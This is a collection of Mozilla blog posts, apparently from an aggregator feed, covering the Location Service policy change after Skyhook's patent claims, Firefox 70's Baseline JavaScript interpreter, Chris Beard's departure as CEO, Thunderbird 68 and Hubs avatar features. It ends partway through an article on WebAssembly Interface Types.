Today Mozilla is announcing a policy change regarding MLS. Our new policy will impose limits on commercial use of MLS. Mozilla has not made this change by choice. Skyhook Holdings, Inc. contacted Mozilla some time ago and alleged that MLS infringed a number of its patents. We subsequently reached an agreement with Skyhook that avoids litigation. While the terms of the agreement are confidential, we can tell you that the agreement exists and that our MLS policy change relates to it. We can also confirm that this agreement does not change the privacy properties of our service: Skyhook does not receive location data from Mozilla or our users.

Our new policy preserves the public interest heart of the MLS project. Mozilla has never offered any commercial plans for MLS and had no intention to do so. Only a handful of entities have made use of MLS API Query keys for commercial ventures. Nevertheless, we regret having to impose new limits on MLS. Sometimes companies have to make difficult choices that balance the massive cost and uncertainty of patent litigation against other priorities.

Mozilla has long argued that patents can work to inhibit, rather than promote, innovation. We continue to believe that software development, and especially open-source software, is ill-served by the patent system. Mozilla endeavors to be a good citizen with respect to patents. We offer a free license to our own patents under the Mozilla Open Software Patent License Agreement. We will also continue our advocacy for a better patent system.

Under our new policy, all users of MLS API Query keys must apply. Non-commercial users (such as academic, public interest, research, or open-source projects) can request an MLS API Query key capped at a daily usage limit of 100,000 queries. This limit may be increased on request. Commercial users can request an MLS API Query key with the same daily limit of 100,000 queries. The daily limit cannot be increased for commercial uses, and those keys will expire after 3 months. In effect, commercial use of MLS will now be of limited duration and restricted in volume.

Existing keys will expire on March 1, 2020. We encourage non-commercial users to re-apply for continued use of the service. Keys for a small number of commercial users that have been exceeding request limits will expire sooner. We will reach out to those users directly.

Location data and services are incredibly valuable in today’s connected world. We will continue to provide an open-source and privacy respecting location service in the public interest. You can help us crowdsource data by opting-in to the contribution option in our Android mobile browser.

about:communityFirefox 69 new contributors

With the release of Firefox 69, we are pleased to welcome the 50 developers who contributed their first code change to Firefox in this release, 39 of whom were brand new volunteers! Please join us in thanking each of these diligent and enthusiastic individuals, and take a look at their contributions:

hacks.mozilla.orgThe Baseline Interpreter: a faster JS interpreter in Firefox 70


Modern web applications load and execute a lot more JavaScript code than they did just a few years ago. While JIT (just-in-time) compilers have been very successful in making JavaScript performant, we needed a better solution to deal with these new workloads.

To address this, we’ve added a new, generated JavaScript bytecode interpreter to the JavaScript engine in Firefox 70. The interpreter is available now in the Firefox Nightly channel, and will go to general release in October. Instead of writing or generating a new interpreter from scratch, we found a way to do this by sharing most code with our existing Baseline JIT.

The new Baseline Interpreter has resulted in performance improvements, memory usage reductions and code simplifications. Here’s how we got there:

Execution tiers

In modern JavaScript engines, each function is initially executed in a bytecode interpreter. Functions that are called a lot (or perform many loop iterations) are compiled to native machine code. (This is called JIT compilation.)

Firefox has an interpreter written in C++ and multiple JIT tiers:

  • The Baseline JIT. Each bytecode instruction is compiled directly to a small piece of machine code. It uses Inline Caches (ICs) both as performance optimization and to collect type information for Ion.
  • IonMonkey (or just Ion), the optimizing JIT. It uses advanced compiler optimizations to generate fast code for hot functions (at the expense of slower compile times).

Ion JIT code for a function can be ‘deoptimized’ and thrown away for various reasons, for example when the function is called with a new argument type. This is called a bailout. When a bailout happens, execution continues in the Baseline code until the next Ion compilation.
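The tier-up and bailout behavior described above can be modeled as a small state machine (a simplified sketch, not SpiderMonkey’s actual implementation; the Ion threshold value here is an assumption, while the Baseline threshold of 10 matches the old value mentioned later in the article):

```python
# Simplified model of JIT tiering with bailouts (illustrative only).
# A function starts in the interpreter, tiers up as its warm-up count
# grows, and a bailout discards Ion code and resumes in Baseline.

BASELINE_THRESHOLD = 10   # old Baseline JIT warm-up threshold
ION_THRESHOLD = 1000      # assumed value for illustration

class Function:
    def __init__(self, name):
        self.name = name
        self.warm_up_count = 0   # calls + loop iterations so far
        self.tier = "interpreter"

    def on_execute(self):
        self.warm_up_count += 1
        if self.tier == "interpreter" and self.warm_up_count >= BASELINE_THRESHOLD:
            self.tier = "baseline-jit"
        if self.tier == "baseline-jit" and self.warm_up_count >= ION_THRESHOLD:
            self.tier = "ion"

    def on_bailout(self):
        # Ion code is deoptimized (e.g. a new argument type was seen);
        # execution continues in Baseline until the next Ion compilation.
        assert self.tier == "ion"
        self.tier = "baseline-jit"

f = Function("hot_loop")
for _ in range(1000):
    f.on_execute()
assert f.tier == "ion"
f.on_bailout()
assert f.tier == "baseline-jit"
```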

Until Firefox 70, the execution pipeline for a very hot function looked like this:

Timeline showing C++ Interpreter, Baseline Compilation, Baseline JIT Code, Prepare for Ion, Ion JIT Code with an arrow (called bailout) from Ion JIT Code back to Baseline JIT Code


Although this works pretty well, we ran into the following problems with the first part of the pipeline (C++ Interpreter and Baseline JIT):

  1. Baseline JIT compilation is fast, but modern web applications like Google Docs or Gmail execute so much JavaScript code that we could spend quite some time in the Baseline compiler, compiling thousands of functions.
  2. Because the C++ interpreter is so slow and doesn’t collect type information, delaying Baseline compilation or moving it off-thread would have been a performance risk.
  3. As you can see in the diagram above, optimized Ion JIT code was only able to bail out to the Baseline JIT. To make this work, Baseline JIT code required extra metadata (the machine code offset corresponding to each bytecode instruction).
  4. The Baseline JIT had some complicated code for bailouts, debugger support, and exception handling. This was especially true where these features intersect!

Solution: generate a faster interpreter

We needed type information from the Baseline JIT to enable the more optimized tiers, and we wanted to use JIT compilation for runtime speed. However, the modern web has such large codebases that even the relatively fast Baseline JIT Compiler spent a lot of time compiling. To address this, Firefox 70 adds a new tier called the Baseline Interpreter to the pipeline:

Same timeline of execution tiers as before but now has the 'Baseline Interpreter' between C++ interpreter and Baseline compilation. The bailout arrow points to Baseline Interpreter instead of Baseline JIT Code.

The Baseline Interpreter sits between the C++ interpreter and the Baseline JIT and has elements from both. It executes all bytecode instructions with a fixed interpreter loop (like the C++ interpreter). In addition, it uses Inline Caches to improve performance and collect type information (like the Baseline JIT).

Generating an interpreter isn’t a new idea. However, we found a nice new way to do it by reusing most of the Baseline JIT Compiler code. The Baseline JIT is a template JIT, meaning each bytecode instruction is compiled to a mostly fixed sequence of machine instructions. We generate those sequences into an interpreter loop instead.
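The idea of instantiating per-opcode templates into an interpreter loop can be shown in miniature (a toy stack machine in Python; in SpiderMonkey the templates emit machine-code sequences, not Python closures, and the opcode names here are made up):

```python
# Toy illustration of a template-generated interpreter: each opcode has
# a "template" that we instantiate into a handler, and a dispatch table
# threads execution from one handler to the next.

def make_handler(op):
    # In the Baseline JIT these templates emit mostly fixed sequences
    # of machine instructions; here they just build Python closures.
    if op == "ZERO":
        def handler(stack, pc):
            stack.append(0)      # push the value 0
            return pc + 1
    elif op == "ADD1":
        def handler(stack, pc):
            stack.append(stack.pop() + 1)
            return pc + 1
    elif op == "RET":
        def handler(stack, pc):
            return None          # stop dispatch
    return handler

OPCODES = ["ZERO", "ADD1", "RET"]
DISPATCH = {op: make_handler(op) for op in OPCODES}  # the generated "loop body"

def interpret(bytecode):
    stack, pc = [], 0
    while pc is not None:
        pc = DISPATCH[bytecode[pc]](stack, pc)
    return stack[-1]

assert interpret(["ZERO", "ADD1", "ADD1", "RET"]) == 2
```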

Sharing Inline Caches and profiling data

As mentioned above, the Baseline JIT uses Inline Caches (ICs) both to make it fast and to help Ion compilation. To get type information, the Ion JIT compiler can inspect the Baseline ICs.

Because we wanted the Baseline Interpreter to use exactly the same Inline Caches and type information as the Baseline JIT, we added a new data structure called JitScript. JitScript contains all type information and IC data structures used by both the Baseline Interpreter and JIT.

The diagram below shows what this looks like in memory. Each arrow is a pointer in C++. Initially, the function just has a JSScript with the bytecode that can be interpreted by the C++ interpreter. After a few calls/iterations we create the JitScript, attach it to the JSScript and can now run the script in the Baseline Interpreter.

As the code gets warmer we may also create the BaselineScript (Baseline JIT code) and then the IonScript (Ion JIT code).
JSScript (bytecode) points to JitScript (IC and profiling data). JitScript points to BaselineScript (Baseline JIT Code) and IonScript (Ion JIT code).

Note that the Baseline JIT data for a function is now just the machine code. We’ve moved all the inline caches and profiling data into JitScript.
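The ownership relationships in the diagram can be sketched with plain objects (field names are illustrative; the real structures are C++):

```python
# Sketch of the script data layout after the change (illustrative).
# JSScript owns the bytecode; JitScript holds the ICs and profiling
# data shared by the Baseline Interpreter and Baseline JIT; the JIT
# scripts now hold only machine code.

class BaselineScript:
    def __init__(self):
        self.machine_code = b"..."   # Baseline JIT code only, no IC data

class IonScript:
    def __init__(self):
        self.machine_code = b"..."   # Ion JIT code

class JitScript:
    def __init__(self):
        self.inline_caches = []      # shared by interpreter and JIT
        self.type_info = {}          # profiling data Ion can inspect
        self.baseline_script = None  # created as the code gets warmer
        self.ion_script = None

class JSScript:
    def __init__(self, bytecode):
        self.bytecode = bytecode     # runnable by the C++ interpreter alone
        self.jit_script = None       # attached after a few calls/iterations

script = JSScript(bytecode=[0x00, 0x01])
script.jit_script = JitScript()                       # warm: Baseline Interpreter
script.jit_script.baseline_script = BaselineScript()  # warmer: Baseline JIT
script.jit_script.ion_script = IonScript()            # hot: Ion
assert script.jit_script.baseline_script is not None
```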

Sharing the frame layout

The Baseline Interpreter uses the same frame layout as the Baseline JIT, but we’ve added some interpreter-specific fields to the frame. For example, the bytecode PC (program counter), a pointer to the bytecode instruction we are currently executing, is not updated explicitly in Baseline JIT code. It can be determined from the return address if needed, but the Baseline Interpreter has to store it in the frame.

Sharing the frame layout like this has a lot of advantages. We’ve made almost no changes to C++ and IC code to support Baseline Interpreter frames—they’re just like Baseline JIT frames. Furthermore, when the script is warm enough for Baseline JIT compilation, switching from Baseline Interpreter code to Baseline JIT code is a matter of jumping from the interpreter code into JIT code.
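The shared layout with an interpreter-only field can be sketched as follows (field names are illustrative, not the actual C++ frame members):

```python
# Sketch of the shared frame layout (illustrative). Baseline JIT frames
# and Baseline Interpreter frames share the same fields, so C++ and IC
# code can treat them identically; only the interpreter stores an
# explicit bytecode pc in the frame.

from dataclasses import dataclass
from typing import Optional

@dataclass
class BaselineFrame:
    callee: str
    local_slots: list
    return_address: int
    # Interpreter-only field: JIT code can recover the pc from the
    # return address when needed, so it leaves this unset.
    interpreter_pc: Optional[int] = None

jit_frame = BaselineFrame(callee="f", local_slots=[], return_address=0x1234)
interp_frame = BaselineFrame(callee="f", local_slots=[], return_address=0x1234,
                             interpreter_pc=0)
assert jit_frame.interpreter_pc is None
assert interp_frame.interpreter_pc == 0
```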

Sharing code generation

Because the Baseline Interpreter and JIT are so similar, a lot of the code generation code can be shared too. To do this, we added a templated BaselineCodeGen base class with two derived classes, one for the Baseline Interpreter and one for the Baseline JIT compiler.

The base class has a Handler C++ template argument that can be used to specialize behavior for either the Baseline Interpreter or JIT. A lot of Baseline JIT code can be shared this way. For example, the implementation of the JSOP_GETPROP bytecode instruction (for a property access like obj.foo in JavaScript code) is shared code. It calls the emitNextIC helper method that’s specialized for either Interpreter or JIT mode.
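The Handler-based specialization can be mimicked in Python with a strategy object (a loose sketch; the real code uses C++ templates, and the strings returned here stand in for emitted machine code):

```python
# Sketch of BaselineCodeGen's Handler specialization (illustrative).
# The shared emitter for an opcode calls emit_next_ic, whose behavior
# differs between compiler mode and interpreter mode.

class CompilerHandler:
    def emit_next_ic(self):
        return "IC call baked in for this exact bytecode offset"

class InterpreterHandler:
    def emit_next_ic(self):
        return "IC lookup based on the current bytecode pc"

class BaselineCodeGen:
    def __init__(self, handler):
        self.handler = handler

    def emit_getprop(self):
        # Shared code for a property access like obj.foo: most of the
        # logic is identical; only the IC plumbing is specialized.
        return "guard object; " + self.handler.emit_next_ic()

jit_gen = BaselineCodeGen(CompilerHandler())
interp_gen = BaselineCodeGen(InterpreterHandler())
assert jit_gen.emit_getprop() != interp_gen.emit_getprop()
```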

Generating the Interpreter

With all these pieces in place, we were able to implement the BaselineInterpreterGenerator class to generate the Baseline Interpreter! It generates a threaded interpreter loop: the code for each bytecode instruction is followed by an indirect jump to the interpreter code for the next bytecode instruction.

For example, on x64 we currently generate the following machine code to interpret JSOP_ZERO (bytecode instruction to push a zero value on the stack):

// Push Int32Value(0).
movabsq $-0x7800000000000, %r11
pushq  %r11
// Increment bytecode pc register.
addq   $0x1, %r14
// Patchable NOP for debugger support.
nopl   (%rax,%rax)
// Load the next opcode.
movzbl (%r14), %ecx
// Jump to interpreter code for the next instruction.
leaq   0x432e(%rip), %rbx
jmpq   *(%rbx,%rcx,8)

When we enabled the Baseline Interpreter in Firefox Nightly (version 70) back in July, we increased the Baseline JIT warm-up threshold from 10 to 100. The warm-up count is determined by counting the number of calls to the function + the number of loop iterations so far. The Baseline Interpreter has a threshold of 10, same as the old Baseline JIT threshold. This means that the Baseline JIT has a lot less code to compile.
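With the new thresholds, tier selection by warm-up count looks roughly like this (a simplified sketch; the interpreter and Baseline JIT thresholds are the values stated above, while the Ion threshold value is an assumption for illustration):

```python
# Simplified tier selection in Firefox 70 (illustrative). The warm-up
# count is the number of calls plus the number of loop iterations so far.

def tier_for(warm_up_count, ion_threshold=1000):  # Ion value is an assumption
    if warm_up_count < 10:        # Baseline Interpreter threshold (old JIT value)
        return "c++-interpreter"
    if warm_up_count < 100:       # raised Baseline JIT threshold
        return "baseline-interpreter"
    if warm_up_count < ion_threshold:
        return "baseline-jit"
    return "ion"

assert tier_for(5) == "c++-interpreter"
assert tier_for(50) == "baseline-interpreter"
assert tier_for(500) == "baseline-jit"
assert tier_for(5000) == "ion"
```

Because functions now have to reach a warm-up count of 100 before Baseline JIT compilation, the Baseline JIT has far fewer functions to compile.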


Performance and memory usage

After this landed in Firefox Nightly our performance testing infrastructure detected several improvements:

  • Various 2-8% page load improvements. A lot happens during page load in addition to JS execution (parsing, style, layout, graphics). Improvements like this are quite significant.
  • Many devtools performance tests improved by 2-10%.
  • Some small memory usage wins.

Note that we’ve shipped more performance improvements since this work first landed.

To measure how the Baseline Interpreter’s performance compares to the C++ Interpreter and the Baseline JIT, I ran Speedometer and Google Docs on Windows 10 64-bit on Mozilla’s Try server and enabled the tiers one by one (the numbers below reflect the best of 7 runs):
Google Docs load time: C++ Interpreter 901 ms; + Baseline Interpreter 676 ms; + Baseline JIT 633 ms
On Google Docs we see that the Baseline Interpreter is much faster than just the C++ Interpreter. Enabling the Baseline JIT too makes the page load only a little bit faster.

On the Speedometer benchmark we get noticeably better results when we enable the Baseline JIT tier. The Baseline Interpreter does again much better than just the C++ Interpreter:
Speedometer score: C++ Interpreter 31 points; + Baseline Interpreter 52 points; + Baseline JIT 69 points
We think these numbers are great: the Baseline Interpreter is much faster than the C++ Interpreter and its start-up time (JitScript allocation) is much faster than Baseline JIT compilation (at least 10 times faster).


After this all landed and stuck, we were able to simplify the Baseline JIT and Ion code by taking advantage of the Baseline Interpreter.

For example, deoptimization bailouts from Ion now resume in the Baseline Interpreter instead of in the Baseline JIT. The interpreter can re-enter Baseline JIT code at the next loop iteration in the JS code. Resuming in the interpreter is much easier than resuming in the middle of Baseline JIT code. We now have to record less metadata for Baseline JIT code, so Baseline JIT compilation got faster too. Similarly, we were able to remove a lot of complicated code for debugger support and exception handling.

What’s next?

With the Baseline Interpreter in place, it should now be possible to move Baseline JIT compilation off-thread. We will be working on that in the coming months, and we anticipate more performance improvements in this area.


Although I did most of the Baseline Interpreter work, many others contributed to this project. In particular Ted Campbell and Kannan Vijayan reviewed most of the code changes and had great design feedback.

Also thanks to Steven DeTar, Chris Fallin, Havi Hoffman, Yulia Startsev, and Luke Wagner for their feedback on this blog post.

The post The Baseline Interpreter: a faster JS interpreter in Firefox 70 appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogThank you, Chris

Thank you, Chris.

Chris Beard has been Mozilla Corporation’s CEO for 5 and a half years. Chris has announced 2019 will be his last year in this role. I want to thank Chris from the bottom of my heart for everything he has done for Mozilla. He has brought Mozilla enormous benefits — new ideas, new capabilities, new organizational approaches. As CEO Chris has put us on a new and better path. Chris’ tenure has seen the development of important organization capabilities and given us a much stronger foundation on which to build. This includes reinvigorating our flagship web browser Firefox to be once again a best-in-class product. It includes recharging our focus on meeting the online security and privacy needs facing people today. And it includes expanding our product offerings beyond the browser to include a suite of privacy and security-focused products and services from Facebook Container and Enhanced Tracking Protection to Firefox Monitor.

Chris will remain an advisor to the board. We recognize some people may think these words are a formula and have no deep meaning. We think differently. Chris is a true “Mozillian.” He has been devoted to Mozilla for the last 15 years, and has brought this dedication to many different roles at Mozilla. When Chris left Mozilla to join Greylock as an “executive-in-residence” in 2013, he remained an advisor to Mozilla Corporation. That was an important relationship, and Chris and I were in contact when it started to become clear that Chris could be the right CEO for MoCo. So over the coming years I expect to work with Chris on mission-related topics. And I’ll consider myself lucky to do so.

One of the accomplishments of Chris’ tenure is the strength and depth of Mozilla Corporation today. The team is strong. Our organization is strong, and our future full of opportunities. It is precisely the challenges of today’s world, and Mozilla’s opportunities to improve online life, that bring so many of us to Mozilla. I personally remain deeply focused on Mozilla. I’ll be here during Chris’ tenure, and I’ll be here after his tenure ends. I’m committed to Mozilla, and to making serious contributions to improving online life and developing new technical capabilities that are good for people.

Chris will remain as CEO during the transition. We will continue to develop our new engagement model and our focus on privacy and user agency. To ensure continuity, I will increase my involvement in Mozilla Corporation’s internal activities. I will be ready to step in as interim CEO should the need arise.

The Board has retained Tuck Rickards of the recruiting firm Russell Reynolds for this search. We are confident that Tuck and team understand that Mozilla products and technology bring our mission to life, and that we are deeply different than other technology companies. We’ll say more about the search as we progress.

The internet stands at an inflection point today. Mozilla has the opportunity to make significant contributions to a better internet. This is why we exist, and it’s a key time to keep doing more. We offer heartfelt thanks to Chris for leading us to this spot, and for leading the rejuvenation of Mozilla Corporation so that we are fit for this purpose, and determined to address big issues.

Mozilla’s greatest strength is the people who respond to our mission and step forward to take on the challenge of building a better internet and online life. Chris is a shining example of this. I wish Chris the absolute best in all things.

I’ll close by stating a renewed determination to find ways for everyone who seeks safe, humane and exciting online experiences to help create this better world.

The post Thank you, Chris appeared first on The Mozilla Blog.

The Mozilla BlogMy Next Chapter

Earlier this morning I shared the news internally that – while I’ve been a Mozillian for 15 years so far, and plan to be for many more years – this will be my last year as CEO.

When I returned to Mozilla just over five years ago, it was during a particularly tumultuous time in our history. Looking back it’s amazing to reflect on how far we’ve come, and I am so incredibly proud of all that our teams have accomplished over the years.

Today our products, technology and policy efforts are stronger and more resonant in the market than ever, and we have built significant new organizational capabilities and financial strength to fuel our work. From our new privacy-forward product strategy to initiatives like the State of the Internet we’re ready to seize the tremendous opportunity and challenges ahead to ensure we’re doing even more to put people in control of their connected lives and shape the future of the internet for the public good.

In short, Mozilla is an exceptionally better place today, and we have all the fundamentals in place for continued positive momentum for years to come.

It’s with that backdrop that I made the decision that it’s time for me to take a step back and start my own next chapter. This is a good place to recruit our next CEO and for me to take a meaningful break and recharge before considering what’s next for me. It may be a cliché — but I’ll embrace it — as I’m also looking forward to spending more time with my family after a particularly intense but gratifying tour of duty.

However, I’m not wrapping up today or tomorrow, but at year’s end. I’m absolutely committed to ensuring that we sustain the positive momentum we have built. Mitchell Baker and I are working closely together with our Board of Directors to ensure leadership continuity and a smooth transition. We are conducting a search for my successor and I will continue to serve as CEO through that transition. If the search goes beyond the end of the year, Mitchell will step in as interim CEO if necessary, to ensure we don’t miss a beat. And I will stay engaged for the long-term as advisor to both Mitchell and the Board, as I’ve done before.

I am grateful to have had this opportunity to serve Mozilla again, and to Mitchell for her trust and partnership in building this foundation for the future.

Over the coming months I’m excited to share with you the new products, technology and policy work that’s in development now. I am more confident than ever that Mozilla’s brightest days are yet to come.

Thoughts from Mozilla Board Members on Chris Beard’s Tenure as CEO
Chairwoman Mitchell Baker’s Reflections on Chris’ Time at Mozilla

The post My Next Chapter appeared first on The Mozilla Blog.

The Mozilla Thunderbird BlogWhat’s New in Thunderbird 68

Our newest release, Thunderbird version 68, is now available! Users on version 60, the last major release, will not be updated immediately, but will receive the update in the coming weeks. In this blog post, we’ll take a look at the most noteworthy features in the newest version. If you’d like to see all the changes in version 68, you can check out the release notes.

Thunderbird 68 focuses on polish and setting the stage for future releases. There was a lot of work that we had to do below the surface that has made Thunderbird more future-proof and has made it a solid base to continue to build upon. But we also managed to create some great features you can touch today.

New App Menu

Thunderbird 68 features a big update to the App Menu. The new menu is single pane with icons and separators that make it easier to navigate and reduce clutter. Animation when cycling through menu items produces a more engaging experience and results in the menu feeling more responsive and modern.

Thunderbird’s New App Menu

Options/Preferences in a Tab

Thunderbird’s Options/Preferences have been moved from a dialog window to a dedicated tab. The new Preferences tab provides more space, which allows for better-organized content and is more consistent with the look and feel of the rest of Thunderbird. The new tab also makes it easier to multitask, without the problem of losing track of your preferences when switching between windows.

Preferences in a Tab

Full Color Support

Thunderbird now features full color support across the app. This means you can change the text of your email to any color you want, or set tags to any shade your heart desires.

New Full Color Picker

Better Dark Theme

The dark theme available in Thunderbird has been enhanced with a dark message thread pane as well as many other small improvements.

Thunderbird Dark Theme

Attachment Management

There are now more options available for managing attachments. You can “detach” an attachment to store it in a different folder while maintaining a link from the email to the new location. You can also open the folder containing a detached file via the “Open Containing Folder” option.

Attachment options for detached files.

Filelink Improved

Filelink attachments that have already been uploaded can now be linked to again instead of having to re-upload them. Also, an account is no longer required to use the default Filelink provider – WeTransfer.

Other Filelink providers like Box and Dropbox are not included by default but can be added by grabbing the Dropbox and Box add-ons.

Other Notable Changes

There are many other smaller changes that make Thunderbird 68 feel polished and powerful, including an updated To/CC/BCC selector in the compose window, filters that can be set to run periodically, and feed articles that now show external attachments as links.

There are many other updates in this release; you can see a list of all of them in the Thunderbird 68 release notes. If you would like to try the newest Thunderbird, head to our website and download it today!

QMOFirefox 69 Beta 14 Testday Results

Hello Mozillians!

As you may already know, on Friday, August 16th we held a new Testday event for Firefox 69 Beta 14.

Thank you all for helping us make Mozilla a better place: Fernando and noelonassis!

Results: Several test cases were executed for: Anti-tracking.

Thanks for another awesome testday, we appreciate your contribution! 🙂

We hope to see you all in our next events, keep an eye on QMO.
We will make announcements as soon as something shows up!


Mozilla VR BlogNew Avatar Features in Hubs

It is now easier than ever to customize avatars for Hubs! Choosing the way that you represent yourself in a 3D space is an important part of interacting in a virtual world, and we want to make it possible for anyone to have creative control over how they choose to show up in their communities. With the new avatar remixing update, members of the Hubs community can publish avatars that they create under a remixable, Creative Commons license, and grant others the ability to derive new works from those avatars. We’ve also added more options for creating custom avatars.

When you change your avatar in Hubs, you will now have the opportunity to browse through ‘Featured’ avatars and ‘Newest’ avatars. Avatars that are remixable will have an icon on them that allows you to save a version of that avatar to your own ‘My Avatars’ library, where you can customize the textures on the avatar to create your own spin on the original work. The ‘Red Panda’ avatar below is a remix of the original Panda Bot.

In addition to remixing avatars, you can create avatars by uploading a binary glTF file (or selecting one of the base bots that Hubs provides) and uploading up to four texture maps to the model. We have a number of resources available on GitHub for creating custom textures, as well as sets to get you started. You can also make your own designs with a 2D image editor or a 3D texture painting program.

The Hubs base avatar is a glTF model that has four texture maps and supports physically-based rendering (PBR) materials. This allows a great deal of flexibility in what kind of avatars can be created while still providing a quick way to create custom base color maps. For users who are familiar with 3D modeling, you can also create your own new avatar style from scratch, or by using the provided .blend files in the avatar-pipelines GitHub repo.

We’ve also made it easier to share avatars with one another inside a Hubs room. A tab for ‘Avatars’ now appears in the Create menu, and you can place thumbnails for avatars in the room you’re in to quickly swap between them. This will also allow others in the room to easily change to a specific avatar, which is a fun way to share avatars with a group.

These improvements to our avatar tools are just the start of what we’re working on to increase the opportunities Hubs users have to express themselves on the platform. Making it easy to change your avatar, over and over again, gives users flexibility over how much personal information their avatar reveals, and lets them easily change from one digital body to another depending on how they’re using Hubs at a given time. While at Mozilla we find Panda Robots to be perfectly suited to company meetings, other communities and groups will have their own established social norms for professional activities. We want to support a rich, creative ecosystem for our users, and we can’t wait to see what you create!

Open Policy & AdvocacyMozilla Mornings on the future of EU content regulation

On 10 September, Mozilla will host the next installment of our EU Mozilla Mornings series – regular breakfast meetings where we bring together policy experts, policymakers and practitioners for insight and discussion on the latest EU digital policy developments.

The next installment will focus on the future of EU content regulation. We’re bringing together a high-level panel to discuss how the European Commission should approach the mooted Digital Services Act, and to lay out a vision for a sustainable and rights-protective content regulation framework in Europe.


  • Werner Stengg, Head of Unit, E-Commerce & Platforms, European Commission DG CNECT
  • Alan Davidson, Vice President of Global Policy, Trust & Security, Mozilla
  • Liz Carolan, Executive Director, Digital Action
  • Eliska Pirkova, Europe Policy Analyst, Access Now

Moderated by Brian Maguire, EURACTIV

Logistical information

10 September 2019
L42 Business Centre, rue de la Loi 42, Brussels 1040


Register your attendance here

The post Mozilla Mornings on the future of EU content regulation appeared first on Open Policy & Advocacy.

SUMO BlogIntroducing Bryce and Brady

Hello SUMO Community,

I’m thrilled to share this update with you today. Bryce and Brady joined us last week and will be able to help out on Support for some of the new efforts Mozilla is working on towards creating a connected and integrated Firefox experience.

They are going to be involved with new products, but they will also continue to put extra effort into providing support on the forums, as well as serving as an escalation point for hard-to-solve issues.

Here is a short introduction to Brady and Bryce:

Hi! My name is Brady, and I am one of the new members of the SUMO team. I am originally from Boise, Idaho and am currently going to school for a Computer Science degree at Boise State. In my free time, I’m normally playing video games, writing, drawing, or enjoying the Sawtooths. I will be providing support for Mozilla products and for the SUMO team.

Hello! My name is Bryce. I was born and raised in San Diego and I reside in Boise, Idaho. Growing up, I spent a good portion of my life trying to be the best sponger (boogie boarder) and longboarder in North County San Diego. While out in the ocean I had all sorts of run-ins with sea creatures, but nothing too scary. I am also an In-N-Out fan, so you may find me sporting their merchandise with boardshorts and the like. I am truly excited to be part of this amazing group of fun-loving folks and I am looking forward to getting to know everyone.

Please welcome them warmly!

hacks.mozilla.orgWebAssembly Interface Types: Interoperate with All the Things!

People are excited about running WebAssembly outside the browser.

That excitement isn’t just about WebAssembly running in its own standalone runtime. People are also excited about running WebAssembly from languages like Python, Ruby, and Rust.

Why would you want to do that? A few reasons:

  • Make “native” modules less complicated
    Runtimes like Node or Python’s CPython often allow you to write modules in low-level languages like C++, too. That’s because these low-level languages are often much faster. So you can use native modules in Node, or extension modules in Python. But these modules are often hard to use because they need to be compiled on the user’s device. With a WebAssembly “native” module, you can get most of the speed without the complication.
  • Make it easier to sandbox native code
    On the other hand, low-level languages like Rust wouldn’t use WebAssembly for speed. But they could use it for security. As we talked about in the WASI announcement, WebAssembly gives you lightweight sandboxing by default. So a language like Rust could use WebAssembly to sandbox native code modules.
  • Share native code across platforms
    Developers can save time and reduce maintenance costs if they can share the same codebase across different platforms (e.g. between the web and a desktop app). This is true for both scripting and low-level languages. And WebAssembly gives you a way to do that without making things slower on these platforms.

Scripting languages like Python and Ruby saying 'We like WebAssembly's speed', low-level languages like Rust and C++ saying, 'and we like the security it could give us' and all of them saying 'and we all want to make developers more effective'

So WebAssembly could really help other languages with important problems.

But with today’s WebAssembly, you wouldn’t want to use it in this way. You can run WebAssembly in all of these places, but that’s not enough.

Right now, WebAssembly only talks in numbers. This means the two languages can call each other’s functions.

But if a function takes or returns anything besides numbers, things get complicated. You can either:

  • Ship one module that has a really hard-to-use API that only speaks in numbers… making life hard for the module’s user.
  • Add glue code for every single environment you want this module to run in… making life hard for the module’s developer.

But this doesn’t have to be the case.

It should be possible to ship a single WebAssembly module and have it run anywhere… without making life hard for either the module’s user or developer.

user saying 'what even is this API?' vs developer saying 'ugh, so much glue code to worry about' vs both saying 'wait, it just works?'

So the same WebAssembly module could use rich APIs, using complex types, to talk to:

  • Modules running in their own native runtime (e.g. Python modules running in a Python runtime)
  • Other WebAssembly modules written in different source languages (e.g. a Rust module and a Go module running together in the browser)
  • The host system itself (e.g. a WASI module providing the system interface to an operating system or the browser’s APIs)

A wasm file with arrows pointing to and from: logos for different runtimes (Ruby, php, and Python), other wasm files compiled from Rust and Go, and host systems like the OS or browser

And with a new, early-stage proposal, we’re seeing how we can make this Just Work™, as you can see in this demo.

So let’s take a look at how this will work. But first, let’s look at where we are today and the problems that we’re trying to solve.

WebAssembly talking to JS

WebAssembly isn’t limited to the web. But up to now, most of WebAssembly’s development has focused on the Web.

That’s because you can make better designs when you focus on solving concrete use cases. The language was definitely going to have to run on the Web, so that was a good use case to start with.

This gave the MVP a nicely contained scope. WebAssembly only needed to be able to talk to one language—JavaScript.

And this was relatively easy to do. In the browser, WebAssembly and JS both run in the same engine, so that engine can help them efficiently talk to each other.

A js file asking the engine to call a WebAssembly function

The engine asking the WebAssembly file to run the function

But there is one problem when JS and WebAssembly try to talk to each other… they use different types.

Currently, WebAssembly can only talk in numbers. JavaScript has numbers, but also quite a few more types.

And even the numbers aren’t the same. WebAssembly has 4 different kinds of numbers: int32, int64, float32, and float64. JavaScript currently only has Number (though it will soon have another number type, BigInt).

The difference isn’t just in the names for these types. The values are also stored differently in memory.

First off, in JavaScript any value, no matter the type, is put in something called a box (and I explained boxing more in another article).

WebAssembly, in contrast, has static types for its numbers. Because of this, it doesn’t need (or understand) JS boxes.

This difference makes it hard to communicate with each other.

JS asking wasm to add 5 and 7, and Wasm responding with 9.2368828e+18

But if you want to convert a value from one number type to the other, there are pretty straightforward rules.

Because it’s so simple, it’s easy to write down. And you can find this written down in WebAssembly’s JS API spec.

A large book that has mappings between the wasm number types and the JS number types

This mapping is hardcoded in the engines.

It’s kind of like the engine has a reference book. Whenever the engine has to pass parameters or return values between JS and WebAssembly, it pulls this reference book off the shelf to see how to convert these values.

JS asking the engine to call wasm's add function with 5 and 7, and the engine looking up how to do conversions in the book

Having such a limited set of types (just numbers) made this mapping pretty easy. That was great for an MVP. It limited how many tough design decisions needed to be made.

But it made things more complicated for the developers using WebAssembly. To pass strings between JS and WebAssembly, you had to find a way to turn the strings into an array of numbers, and then turn an array of numbers back into a string. I explained this in a previous post.

JS putting numbers into WebAssembly's memory

This isn’t difficult, but it is tedious. So tools were built to abstract this away.

For example, tools like Rust’s wasm-bindgen and Emscripten’s Embind automatically wrap the WebAssembly module with JS glue code that does this translation from strings to numbers.

JS file complaining about having to pass a string to Wasm, and the JS glue code offering to do all the work

And these tools can do these kinds of transformations for other high-level types, too, such as complex objects with properties.

